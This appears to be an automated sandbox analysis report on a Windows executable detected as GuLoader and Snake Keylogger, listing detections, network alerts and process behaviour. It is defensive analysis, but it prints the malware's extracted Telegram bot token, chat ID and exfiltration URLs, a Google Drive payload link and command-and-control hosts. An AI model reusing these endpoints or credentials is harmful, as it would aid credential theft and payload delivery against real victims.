Edit tour

Windows Analysis Report
hUMdKouQ1H.exe

Overview

General Information

Sample name:	hUMdKouQ1H.exe renamed because original name is a hash value
Original sample name:	0f370e4f496e7324bc7a46014e66d3fb5a3817c397b1b5bd148b567489a07b4f.exe
Analysis ID:	1632359
MD5:	5fb01ef00670917a1de3961d00203ba5
SHA1:	b0247f6ceecd0ac6df28bb53de595aeb367c8dc8
SHA256:	0f370e4f496e7324bc7a46014e66d3fb5a3817c397b1b5bd148b567489a07b4f
Tags:	exesignedVIPKeyloggeruser-adrian__luca
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

AI detected suspicious PE digital signature

Joe Sandbox ML detected suspicious sample

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

hUMdKouQ1H.exe (PID: 8064 cmdline: "C:\Users\user\Desktop\hUMdKouQ1H.exe" MD5: 5FB01EF00670917A1DE3961D00203BA5)

hUMdKouQ1H.exe (PID: 7952 cmdline: "C:\Users\user\Desktop\hUMdKouQ1H.exe" MD5: 5FB01EF00670917A1DE3961D00203BA5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7490462916:AAEz89H3J9AylfxjXRLV5diILDx9KkgRSME/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7490462916:AAEz89H3J9AylfxjXRLV5diILDx9KkgRSME", "Chat_id": "7160883909", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000A.00000002.3820358156.0000000035559000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000002.3820358156.0000000035371000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.2581266703.0000000003CDB000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: hUMdKouQ1H.exe PID: 7952	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: hUMdKouQ1H.exe PID: 7952	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T22:52:27.466703+0100	2803305	3	Unknown Traffic	192.168.2.5	49704	104.21.48.1	443	TCP
2025-03-07T22:52:33.453669+0100	2803305	3	Unknown Traffic	192.168.2.5	49706	104.21.48.1	443	TCP
2025-03-07T22:52:49.697008+0100	2803305	3	Unknown Traffic	192.168.2.5	49711	104.21.48.1	443	TCP
2025-03-07T22:53:01.297303+0100	2803305	3	Unknown Traffic	192.168.2.5	49714	104.21.48.1	443	TCP
2025-03-07T22:53:24.473888+0100	2803305	3	Unknown Traffic	192.168.2.5	49719	104.21.48.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T22:52:17.115409+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49702	193.122.130.0	80	TCP
2025-03-07T22:52:18.146641+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49702	193.122.130.0	80	TCP
2025-03-07T22:52:23.193580+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49702	193.122.130.0	80	TCP
2025-03-07T22:52:28.974629+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49705	193.122.130.0	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T22:52:04.079838+0100	2803270	2	Potentially Bad Traffic	192.168.2.5	49700	142.250.186.110	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T22:53:32.253154+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49720	149.154.167.220	443	TCP

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 21:53:28 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.0000000035559000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.0000000035371000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.0000000035371000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.0000000035559000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3820358156.000000003556D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: hUMdKouQ1H.exe, 0000000A.00000002.3823056775.0000000037DF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://c.pki.goog/r/gsr1.crl0
Source: hUMdKouQ1H.exe, 0000000A.00000002.3823056775.0000000037DF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://c.pki.goog/r/r4.crl0
Source: hUMdKouQ1H.exe, 0000000A.00000002.3823056775.0000000037DF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://c.pki.goog/we1/K0UVAKe5N94.crl0
Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.0000000035371000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.0000000035371000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: hUMdKouQ1H.exe, 0000000A.00000002.3823056775.0000000037DF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://i.pki.goog/gsr1.crt0-
Source: hUMdKouQ1H.exe, 0000000A.00000002.3823056775.0000000037DF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://i.pki.goog/r4.crt0
Source: hUMdKouQ1H.exe, 0000000A.00000002.3823056775.0000000037DF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://i.pki.goog/we1.crt05
Source: hUMdKouQ1H.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: hUMdKouQ1H.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: hUMdKouQ1H.exe, 0000000A.00000002.3823056775.0000000037DF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://o.pki.goog/s/we1/8CI0%
Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.0000000035371000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.0000000035371000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.000000003664A000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3821501336.0000000036687000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.000000003546A000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3820358156.0000000035559000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3820358156.000000003556D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.0000000035559000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.000000003546A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.000000003546A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:992547%0D%0ADate%20a
Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.0000000035559000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7490462916:AAEz89H3J9AylfxjXRLV5diILDx9KkgRSME/sendDocument?chat_id=7160
Source: hUMdKouQ1H.exe, 0000000A.00000003.2671264411.0000000004DEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.000000003664A000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3821501336.0000000036687000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.000000003664A000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3821501336.0000000036687000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.000000003664A000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3821501336.0000000036687000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.00000000354FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.00000000354FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.00000000354F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: hUMdKouQ1H.exe, 0000000A.00000002.3799637665.0000000004D38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: hUMdKouQ1H.exe, 0000000A.00000002.3799637665.0000000004D38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/P
Source: hUMdKouQ1H.exe, 0000000A.00000002.3799637665.0000000004D72000.00000004.00000020.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3819926903.0000000034530000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=16mIfz-eiK-erVV3ZLLN6Tu__a6thnGSa
Source: hUMdKouQ1H.exe, 0000000A.00000002.3799637665.0000000004D72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=16mIfz-eiK-erVV3ZLLN6Tu__a6thnGSaG
Source: hUMdKouQ1H.exe, 0000000A.00000003.2755030960.0000000004DAF000.00000004.00000020.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3799637665.0000000004DA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: hUMdKouQ1H.exe, 0000000A.00000003.2671264411.0000000004DEA000.00000004.00000020.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3799637665.0000000004D8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=16mIfz-eiK-erVV3ZLLN6Tu__a6thnGSa&export=download
Source: hUMdKouQ1H.exe, 0000000A.00000003.2755030960.0000000004DAF000.00000004.00000020.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3799637665.0000000004DA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=16mIfz-eiK-erVV3ZLLN6Tu__a6thnGSa&export=downloadtx
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.000000003664A000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3821501336.0000000036687000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.000000003664A000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3821501336.0000000036687000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.000000003664A000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3821501336.0000000036687000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.000000003664A000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3821501336.0000000036687000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.000000003542D000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3820358156.00000000353BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.00000000353BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.00000000353EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.000000003546A000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3820358156.000000003542D000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3820358156.0000000035445000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3820358156.00000000353EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: hUMdKouQ1H.exe, 0000000A.00000003.2671264411.0000000004DEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.000000003664A000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3821501336.0000000036687000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: hUMdKouQ1H.exe, 0000000A.00000003.2671264411.0000000004DEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: hUMdKouQ1H.exe, 0000000A.00000003.2671264411.0000000004DEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.000000003664A000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3821501336.0000000036687000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: hUMdKouQ1H.exe, 0000000A.00000003.2671264411.0000000004DEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: hUMdKouQ1H.exe, 0000000A.00000003.2671264411.0000000004DEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.000000003552E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.000000003552E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/4
Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.0000000035529000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.65:443 -> 192.168.2.5:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49720 version: TLS 1.2

Source: C:\Users\user\Desktop\hUMdKouQ1H.exe

Code function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040535C

Source: C:\Users\user\Desktop\hUMdKouQ1H.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_00403348
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 10_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		10_2_00403348

Source: C:\Users\user\Desktop\hUMdKouQ1H.exe

File created: C:\Windows\Behovsundersgelses

Source: 0000000A.00000002.3820358156.0000000035371000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7490462916:AAEz89H3J9AylfxjXRLV5diILDx9KkgRSME", "Chat_id": "7160883909", "Version": "4.4"}
Source: hUMdKouQ1H.exe.7952.10.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7490462916:AAEz89H3J9AylfxjXRLV5diILDx9KkgRSME/sendMessage"}

Source: hUMdKouQ1H.exe	Virustotal: Detection: 63%			Perma Link
Source: hUMdKouQ1H.exe	ReversingLabs: Detection: 50%

Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 10_2_04C98880 CryptUnprotectData,		10_2_04C98880
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 10_2_04C98EF1 CryptUnprotectData,		10_2_04C98EF1

Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49703 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49709 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49714 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49717 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49719 version: TLS 1.0

Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 0_2_0040646B FindFirstFileA,FindClose,	0_2_0040646B
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 0_2_004027A1 FindFirstFileA,	0_2_004027A1
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004058BF
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 10_2_0040646B FindFirstFileA,FindClose,	10_2_0040646B
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 10_2_004027A1 FindFirstFileA,	10_2_004027A1
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 10_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	10_2_004058BF

Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	File opened: C:\Users\user\AppData\Local\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04BFF6DDh	10_2_04BFF540
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04BFF6DDh	10_2_04BFF72C
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C73080h	10_2_04C72C68
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C72941h	10_2_04C72690
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C7F0A9h	10_2_04C7EE00
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C7CDE9h	10_2_04C7CB40
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C7E3A1h	10_2_04C7E0F8
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C7DF49h	10_2_04C7DCA0
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_04C70040
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C7DAF1h	10_2_04C7D848
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_04C70853
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C73080h	10_2_04C72C62
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C7EC51h	10_2_04C7E9A8
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C7E7F9h	10_2_04C7E550
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C7F959h	10_2_04C7F6B0
